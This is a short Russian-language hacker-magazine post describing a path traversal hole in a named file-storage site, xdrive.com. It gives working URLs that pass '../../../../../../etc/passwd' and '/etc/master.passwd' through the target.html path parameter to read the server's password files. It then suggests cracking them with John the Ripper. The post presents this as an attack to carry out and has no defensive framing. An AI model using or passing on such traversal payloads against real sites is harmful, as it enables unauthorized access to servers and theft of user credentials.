Все вы наверное знаете про сайт www.xdrive.com
— там дают кучу халявного места для владения.
Наверно многие были там и не раз замечали
что у них при нажатии на любую ссылку адрес
изменяется на http://www.xdrive.com/target.html?path=/explorer/login_failed.html.
Ну так вот берем загружаем вот такой урл http://www.xdrive.com/target.html?path=/explorer/
и что мы видим ??? Ну конечно же все
содержимое каталога explorer!!!

Отлично просмотрели мы его и что дальше ?!?!
Конечно же нам нужен их файл паролей. Какие
проблемы? Никаких — дырявость она вечна!
Скармливаем вот такую ссылочку http://www.xdrive.com/target.html?path=../../../../../../etc/passwd
Что мы видим ? Неа, этого нам мало! Вот такую
тогда: http://www.xdrive.com/target.html?path=../../../../../../etc/master.passwd 

Ага, это уже лучше, теперь можно отдохнуть,
пока john the ripper будет работать. Если я ошибся
с урлом к файлам паролей, то вы знаете, как
его найти :).

Оставить мнение

Check Also

Цифровой паноптикон. Настоящее и будущее тотальной слежки за пользователями

Даже если ты тщательно заботишься о защите своих данных, это не даст тебе желаемой приватн…